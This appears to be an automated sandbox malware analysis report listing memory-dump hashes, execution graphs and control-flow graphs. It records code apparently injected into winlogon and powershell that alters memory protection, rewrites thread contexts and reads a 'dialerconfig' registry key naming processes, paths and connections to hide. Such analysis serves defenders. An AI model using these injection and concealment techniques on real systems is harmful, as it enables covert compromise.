                                            • Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                            • Instruction Fuzzy Hash: 62D0A984F17A03A2FE08AB62685507287A0BF08B82BE844B4CE2E06B00DE2CD094C220
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71b155f32fda11d84c03b8ecf693ed0fc1a1f9728e5a24d38fe5f793f4d0d452
                                            • Instruction ID: b96a2d027ae49eed640e44c9572e44d0f3aad0ea84af097d64f72fb7a20327ae
                                            • Opcode Fuzzy Hash: 71b155f32fda11d84c03b8ecf693ed0fc1a1f9728e5a24d38fe5f793f4d0d452
                                            • Instruction Fuzzy Hash: AC31087191CB8C4FDB58DB5C984A6A97BF0FB59320F00426FE449C3262DA74A855CBC2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1822515941.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b6dd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 442ab0fd5210f9a78c8c02e953f50c5b3bca7686b022c79d23285417d2f2a7a6
                                            • Instruction ID: c62613f5e8c42c3cb0db99ea8f80be8038f534f0f0287507d54a5c632e5f350e
                                            • Opcode Fuzzy Hash: 442ab0fd5210f9a78c8c02e953f50c5b3bca7686b022c79d23285417d2f2a7a6
                                            • Instruction Fuzzy Hash: 1A41077140EBC44FE7569B29DC559523FF0EF56320B1A06EFD088CB1A3D625B845C7A2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dd4a908d81d362c04ff6f943c3b6811aafba19051eac1f8b9e5cd3f0a5ad128
                                            • Instruction ID: 46c910354665ff34bb61b33c3910ac33c793ec6eca69e46389a86d7f5f880e55
                                            • Opcode Fuzzy Hash: 8dd4a908d81d362c04ff6f943c3b6811aafba19051eac1f8b9e5cd3f0a5ad128
                                            • Instruction Fuzzy Hash: 1521F631A0CB4C4FDB59DFAC984A7E97FE0EB96321F04426BD458C3162DA74A41ACB91
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
                                            • Instruction ID: 06e1d6d280ca6f07a48e3bc6528028b9f359947669cfabeae758b7bcff46287b
                                            • Opcode Fuzzy Hash: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
                                            • Instruction Fuzzy Hash: 7F01A77020CB0C8FD748EF4CE051AA5B7E0FF85360F10056EE58AC36A1D632E881CB45
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef97e784b982a14a57f2481b5cf2f21379d534dd1c8b4b7d555235d18d5670fc
                                            • Instruction ID: 0db15ed6befc4636bd34bdc8c8d65b7e00f9c9105fbfc382a33f298f47b07a3f
                                            • Opcode Fuzzy Hash: ef97e784b982a14a57f2481b5cf2f21379d534dd1c8b4b7d555235d18d5670fc
                                            • Instruction Fuzzy Hash: E4F0B43191868D8FDB06DF6488559D57FA0FF26210B050297E45CC71B2DB34A558CB92
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1824184472.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b8c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 233be2d6ec139d47a07dc50e82d573d335bd1ab357559d4eb64bad50099a59d9
                                            • Instruction ID: 688a9639d6a086f8a8ae0ee6500ab442f72b901ee5f08059f0b414868250b4df
                                            • Opcode Fuzzy Hash: 233be2d6ec139d47a07dc50e82d573d335bd1ab357559d4eb64bad50099a59d9
                                            • Instruction Fuzzy Hash: F8F05E32B0E9498FDB68EB5CE4518A873E1EF4932171500BBE16DC75B7DA25EC81C744
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1824184472.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b8c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d00a29d9910a15a14c80db149be710741d8f019ca137cd7de941694c5587005
                                            • Instruction ID: 5d7d26bd8fb23ad6ea7c2eaa69419330f9567cbd3fa1c69248cd66a061b9ff75
                                            • Opcode Fuzzy Hash: 1d00a29d9910a15a14c80db149be710741d8f019ca137cd7de941694c5587005
                                            • Instruction Fuzzy Hash: EEF0A73131CF044FD744EE1DD445AA5B3D0FBA8310F10452FE44AC3651DA21E4818782
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1824184472.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd9b8c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 472d27d4eb1483968c272832bc2c94dedd319b33974fbac45d3ee383f483713d
                                            • Instruction ID: 4dea82a5a088f5c6e024354bfe514fa65b4aab1037bf0903a94ca817e18fbd63
                                            • Opcode Fuzzy Hash: 472d27d4eb1483968c272832bc2c94dedd319b33974fbac45d3ee383f483713d
                                            • Instruction Fuzzy Hash: ACF05E72B0E5498FEB68FB5CE4518A877E0EF4932171500BBE15ECB4B3DA26AC80C740

                                            Execution Graph

                                            Execution Coverage:1%
                                            Dynamic/Decrypted Code Coverage:94.3%
                                            Signature Coverage:0%
                                            Total number of Nodes:106
                                            Total number of Limit Nodes:17
                                            execution_graph 28023 225dc643b99 28026 225dc643ae6 28023->28026 28024 225dc643b50 28025 225dc643b36 VirtualQuery 28025->28024 28025->28026 28026->28024 28026->28025 28027 225dc643b6a VirtualAlloc 28026->28027 28027->28024 28028 225dc643b9b GetLastError 28027->28028 28028->28024 28028->28026 28029 225dc6ab860 28030 225dc6ab871 _set_errno_from_matherr 28029->28030 28032 225dc6ab8c0 28030->28032 28033 225dc6ab840 7 API calls _set_errno_from_matherr 28030->28033 28033->28032 28034 225dc612908 28036 225dc612936 28034->28036 28035 225dc612aa7 28036->28035 28037 225dc612994 VirtualAlloc 28036->28037 28037->28035 28039 225dc6129b8 28037->28039 28038 225dc612a2b LoadLibraryA 28038->28039 28039->28035 28039->28038 28040 225dc642a7c 28042 225dc642ac1 28040->28042 28041 225dc642b20 28042->28041 28044 225dc643930 28042->28044 28045 225dc643952 28044->28045 28046 225dc64393d StrCmpNIW 28044->28046 28045->28042 28046->28045 28047 225dc672908 28048 225dc672936 28047->28048 28049 225dc672994 VirtualAlloc 28048->28049 28050 225dc6729b8 28048->28050 28049->28050 28051 225dc641c28 28056 225dc641650 GetProcessHeap HeapAlloc 28051->28056 28053 225dc641c3e Sleep SleepEx 28054 225dc641c37 28053->28054 28054->28053 28055 225dc6415c0 StrCmpIW StrCmpW 28054->28055 28055->28054 28100 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28056->28100 28058 225dc641678 28101 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28058->28101 28060 225dc641689 28102 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28060->28102 28062 225dc641692 28103 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28062->28103 28064 225dc64169b 28065 225dc6416b6 RegOpenKeyExW 28064->28065 28066 225dc6416e8 RegOpenKeyExW 28065->28066 28067 225dc6418ce 28065->28067 28068 225dc641727 RegOpenKeyExW 28066->28068 28069 225dc641711 28066->28069 28067->28054 28071 225dc64174b 28068->28071 28072 225dc641762 RegOpenKeyExW 28068->28072 28111 225dc6412c8 16 API calls 28069->28111 28104 225dc64104c RegQueryInfoKeyW 28071->28104 28073 225dc641786 28072->28073 28074 225dc64179d RegOpenKeyExW 28072->28074 28112 225dc6412c8 16 API calls 28073->28112 28078 225dc6417d8 RegOpenKeyExW 28074->28078 28079 225dc6417c1 28074->28079 28075 225dc64171d RegCloseKey 28075->28068 28083 225dc6417fc 28078->28083 28084 225dc641813 RegOpenKeyExW 28078->28084 28113 225dc6412c8 16 API calls 28079->28113 28081 225dc641793 RegCloseKey 28081->28074 28114 225dc6412c8 16 API calls 28083->28114 28087 225dc641837 28084->28087 28088 225dc64184e RegOpenKeyExW 28084->28088 28085 225dc6417ce RegCloseKey 28085->28078 28092 225dc64104c 6 API calls 28087->28092 28089 225dc641889 RegOpenKeyExW 28088->28089 28090 225dc641872 28088->28090 28094 225dc6418c4 RegCloseKey 28089->28094 28095 225dc6418ad 28089->28095 28093 225dc64104c 6 API calls 28090->28093 28091 225dc641809 RegCloseKey 28091->28084 28096 225dc641844 RegCloseKey 28092->28096 28097 225dc64187f RegCloseKey 28093->28097 28094->28067 28098 225dc64104c 6 API calls 28095->28098 28096->28088 28097->28089 28099 225dc6418ba RegCloseKey 28098->28099 28099->28094 28100->28058 28101->28060 28102->28062 28103->28064 28105 225dc6410b9 28104->28105 28106 225dc6411b5 RegCloseKey 28104->28106 28105->28106 28107 225dc6410c7 RegEnumValueW 28105->28107 28106->28072 28109 225dc64111c 28107->28109 28108 225dc641149 GetProcessHeap HeapAlloc 28108->28109 28109->28106 28109->28107 28109->28108 28110 225dc64117f GetProcessHeap HeapFree 28109->28110 28110->28109 28111->28075 28112->28081 28113->28085 28114->28091 28115 225dc64562d 28116 225dc645634 28115->28116 28117 225dc64569b 28116->28117 28118 225dc645717 VirtualProtect 28116->28118 28119 225dc645751 28118->28119 28120 225dc645743 GetLastError 28118->28120 28120->28119 28121 225dc645dd0 28122 225dc645ddd 28121->28122 28123 225dc645de9 28122->28123 28125 225dc645efa 28122->28125 28124 225dc645e1e 28123->28124 28126 225dc645e6d 28123->28126 28127 225dc645e46 SetThreadContext 28124->28127 28128 225dc645f21 VirtualProtect FlushInstructionCache 28125->28128 28130 225dc645fde 28125->28130 28127->28126 28128->28125 28129 225dc645ffe 28139 225dc644ed0 GetCurrentProcess 28129->28139 28130->28129 28143 225dc6444c0 VirtualFree 28130->28143 28133 225dc646003 28134 225dc646057 28133->28134 28135 225dc646017 ResumeThread 28133->28135 28144 225dc647a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 28134->28144 28136 225dc64604b 28135->28136 28136->28133 28138 225dc64609f 28140 225dc644eec 28139->28140 28141 225dc644f02 VirtualProtect FlushInstructionCache 28140->28141 28142 225dc644f33 28140->28142 28141->28140 28142->28133 28143->28129 28144->28138

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 84d0a864ffcbc837ecc7354a3d772abf192ae96d0213883569f1f6ea5f421f72
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: 18711F3A324F60A6EB109FA9E85869D37B4F784F8AF509521DE4E57B69EF38C445C300

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 51 225dc645c10-225dc645c37 52 225dc645c39-225dc645c48 51->52 53 225dc645c4b-225dc645c56 GetCurrentThreadId 51->53 52->53 54 225dc645c58-225dc645c5d 53->54 55 225dc645c62-225dc645c69 53->55 56 225dc64608f-225dc6460a6 call 225dc647a20 54->56 57 225dc645c7b-225dc645c8f 55->57 58 225dc645c6b-225dc645c76 call 225dc645a40 55->58 61 225dc645c9e-225dc645ca4 57->61 58->56 62 225dc645caa-225dc645cb3 61->62 63 225dc645d75-225dc645d96 61->63 66 225dc645cfa-225dc645d6d call 225dc6445f0 call 225dc644590 call 225dc644550 62->66 67 225dc645cb5-225dc645cf8 call 225dc6486a0 62->67 71 225dc645d9c-225dc645dbc GetThreadContext 63->71 72 225dc645eff-225dc645f10 call 225dc64759f 63->72 80 225dc645d70 66->80 67->80 73 225dc645efa 71->73 74 225dc645dc2-225dc645de3 71->74 83 225dc645f15-225dc645f1b 72->83 73->72 74->73 82 225dc645de9-225dc645df2 74->82 80->61 86 225dc645e72-225dc645e83 82->86 87 225dc645df4-225dc645e05 82->87 88 225dc645f21-225dc645f78 VirtualProtect FlushInstructionCache 83->88 89 225dc645fde-225dc645fee 83->89 95 225dc645ef5 86->95 96 225dc645e85-225dc645ea3 86->96 91 225dc645e07-225dc645e1c 87->91 92 225dc645e6d 87->92 93 225dc645fa9-225dc645fd9 call 225dc64798c 88->93 94 225dc645f7a-225dc645f84 88->94 98 225dc645ffe-225dc64600a call 225dc644ed0 89->98 99 225dc645ff0-225dc645ff7 89->99 91->92 102 225dc645e1e-225dc645e68 call 225dc643a50 SetThreadContext 91->102 92->95 93->83 94->93 103 225dc645f86-225dc645fa1 call 225dc644470 94->103 96->95 104 225dc645ea5-225dc645ef0 call 225dc6439e0 call 225dc6475bd 96->104 112 225dc64600f-225dc646015 98->112 99->98 100 225dc645ff9 call 225dc6444c0 99->100 100->98 102->92 103->93 104->95 116 225dc646057-225dc646075 112->116 117 225dc646017-225dc646055 ResumeThread call 225dc64798c 112->117 120 225dc646089 116->120 121 225dc646077-225dc646086 116->121 117->112 120->56 121->120
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                            • Instruction ID: 944e82db3403cf074b4c20140e3f4fe526249a22eecae15d0e28de081167e2ad
                                            • Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                            • Instruction Fuzzy Hash: A8D19A7A20CF9892DA70DB5AE49835A77A0F7C8B85F104256EACE47BA5DF3CC541CB00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 123 225dc6451b0-225dc6451dc 124 225dc6451ed-225dc6451f6 123->124 125 225dc6451de-225dc6451e6 123->125 126 225dc645207-225dc645210 124->126 127 225dc6451f8-225dc645200 124->127 125->124 128 225dc645221-225dc64522a 126->128 129 225dc645212-225dc64521a 126->129 127->126 130 225dc64522c-225dc645231 128->130 131 225dc645236-225dc645241 GetCurrentThreadId 128->131 129->128 134 225dc6457b3-225dc6457ba 130->134 132 225dc645243-225dc645248 131->132 133 225dc64524d-225dc645254 131->133 132->134 135 225dc645256-225dc64525c 133->135 136 225dc645261-225dc64526a 133->136 135->134 137 225dc64526c-225dc645271 136->137 138 225dc645276-225dc645282 136->138 137->134 139 225dc645284-225dc6452a9 138->139 140 225dc6452ae-225dc645305 call 225dc6457c0 * 2 138->140 139->134 145 225dc64531a-225dc645323 140->145 146 225dc645307-225dc64530e 140->146 147 225dc645335-225dc64533e 145->147 148 225dc645325-225dc645332 145->148 149 225dc645316 146->149 150 225dc645310 146->150 151 225dc645353-225dc645378 call 225dc647950 147->151 152 225dc645340-225dc645350 147->152 148->147 154 225dc645386-225dc64538a 149->154 153 225dc645390-225dc645396 150->153 162 225dc64540d-225dc645422 call 225dc643da0 151->162 163 225dc64537e 151->163 152->151 156 225dc6453c5-225dc6453cb 153->156 157 225dc645398-225dc6453b4 call 225dc644470 153->157 154->153 160 225dc6453f5-225dc645408 156->160 161 225dc6453cd-225dc6453ec call 225dc64798c 156->161 157->156 168 225dc6453b6-225dc6453be 157->168 160->134 161->160 170 225dc645431-225dc64543a 162->170 171 225dc645424-225dc64542c 162->171 163->154 168->156 172 225dc64544c-225dc64549a call 225dc648d50 170->172 173 225dc64543c-225dc645449 170->173 171->154 176 225dc6454a2-225dc6454aa 172->176 173->172 177 225dc6455b7-225dc6455bf 176->177 178 225dc6454b0-225dc64559b call 225dc647520 176->178 179 225dc6455c1-225dc6455d4 call 225dc644670 177->179 180 225dc645603-225dc64560b 177->180 190 225dc64559d 178->190 191 225dc64559f-225dc6455ae call 225dc644140 178->191 195 225dc6455d6 179->195 196 225dc6455d8-225dc645601 179->196 183 225dc645617-225dc645626 180->183 184 225dc64560d-225dc645615 180->184 188 225dc645628 183->188 189 225dc64562f 183->189 184->183 187 225dc645634-225dc645641 184->187 193 225dc645643 187->193 194 225dc645644-225dc645699 call 225dc6486a0 187->194 188->189 189->187 190->177 199 225dc6455b2 191->199 200 225dc6455b0 191->200 193->194 202 225dc64569b-225dc6456a3 194->202 203 225dc6456a8-225dc645741 call 225dc6445f0 call 225dc644550 VirtualProtect 194->203 195->180 196->177 199->176 200->177 208 225dc645751-225dc6457b1 203->208 209 225dc645743-225dc645748 GetLastError 203->209 208->134 209->208
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                            • Instruction ID: db88e7363c8c6d67948adb73f6fa9911972c13677c94ce65f9111591e5b650f5
                                            • Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                            • Instruction Fuzzy Hash: 0002D93A21DB9496E760CB99E49435AB7A1F3C5B85F104155EB8E87BA8EF7CC484CF00

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: ebfbda4d6f83f092f5b40694f6fedf07c780684687202726d78380dbc3561c7a
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 7D113C2A718F54A3EB149BA9F40866AB6A0F748F85F148439DE8A07794EF3DC504C700

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocQuery
                                            • String ID:
                                            • API String ID: 31662377-0
                                            • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                            • Instruction ID: a5174926809f1d8a058b45505692cd786dcb26961728ddb02e83bed768d52ab0
                                            • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                            • Instruction Fuzzy Hash: 5D31102621DE98A1EA30DB9DE05835A72A0F398B85F108575F5CF46BA8DF7DC580CB00

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: f74e7b676ed9400ac381515b8e9436b1a81361eff809a806e376a47053f7f487
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: 32115B7862CF39B2FB21EBEDA80E7993291AB54B07F54C4759A1785194EF3DC044C210

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                            • String ID:
                                            • API String ID: 3733156554-0
                                            • Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                            • Instruction ID: 478e726ee42b9ad2565bb85821ddd20a54e3ccf57beded389c022ecaab978b6a
                                            • Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                            • Instruction Fuzzy Hash: 61F0D06A21CF54D1D630DB49E45575A77A0E3CC7D5F148155F98E07BA9CE39C181CF00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 263 225dc612908-225dc612973 call 225dc610f34 * 4 272 225dc612979-225dc61297c 263->272 273 225dc612b8b 263->273 272->273 275 225dc612982-225dc612985 272->275 274 225dc612b8d-225dc612ba9 273->274 275->273 276 225dc61298b-225dc61298e 275->276 276->273 277 225dc612994-225dc6129b2 VirtualAlloc 276->277 277->273 278 225dc6129b8-225dc6129dc call 225dc610d6c 277->278 281 225dc612a0b-225dc612a12 278->281 282 225dc6129de-225dc612a09 call 225dc610d6c 278->282 283 225dc612a18-225dc612a25 281->283 284 225dc612ab2-225dc612ab9 281->284 282->281 283->284 287 225dc612a2b-225dc612a39 LoadLibraryA 283->287 288 225dc612b6c-225dc612b89 284->288 289 225dc612abf-225dc612ad6 284->289 291 225dc612a3b-225dc612a45 287->291 292 225dc612a9d-225dc612aa5 287->292 288->274 289->288 290 225dc612adc 289->290 293 225dc612ae2-225dc612af7 290->293 294 225dc612a48-225dc612a4c 291->294 292->287 295 225dc612aa7-225dc612aac 292->295 297 225dc612af9-225dc612b0a 293->297 298 225dc612b5b-225dc612b66 293->298 299 225dc612a9a 294->299 300 225dc612a4e-225dc612a52 294->300 295->284 302 225dc612b15-225dc612b19 297->302 303 225dc612b0c-225dc612b13 297->303 298->288 298->293 299->292 304 225dc612a7d-225dc612a87 300->304 305 225dc612a54-225dc612a7b 300->305 307 225dc612b1b-225dc612b22 302->307 308 225dc612b24-225dc612b28 302->308 306 225dc612b48-225dc612b59 303->306 309 225dc612a8d-225dc612a98 304->309 305->309 306->297 306->298 307->306 310 225dc612b3a-225dc612b3e 308->310 311 225dc612b2a-225dc612b38 308->311 309->294 310->306 312 225dc612b40-225dc612b43 310->312 311->306 312->306
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID: AllocLibraryLoadVirtual
                                            • String ID:
                                            • API String ID: 3550616410-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: 084b2b25044c8794af9290a18b9c690fa1b2fa5669142dee8622e2e675240a44
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: 0C61253A702A6297EF69CF9DD44876DB3D1FB04B9AF14C021DA1907785DB38E952C700

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00000225DC641650: GetProcessHeap.KERNEL32 ref: 00000225DC64165B
                                              • Part of subcall function 00000225DC641650: HeapAlloc.KERNEL32 ref: 00000225DC64166A
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DA
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641707
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641721
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641741
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC64175C
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64177C
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641797
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417B7
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6417D2
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417F2
                                            • Sleep.KERNEL32 ref: 00000225DC641C43
                                            • SleepEx.KERNELBASE ref: 00000225DC641C49
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC64180D
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64182D
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641848
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641868
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641883
                                              • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6418A3
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6418BE
                                              • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6418C8
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: 9e56ec6e1a2bb83d4d1e20ad845025165e388ca77e262dcd1bfd0d10c7f0d1f5
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: B53101AD21CE21B1FF549FBED94935A37E4AB44BCAF14D0A1DE0B87696EE34C850C250

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
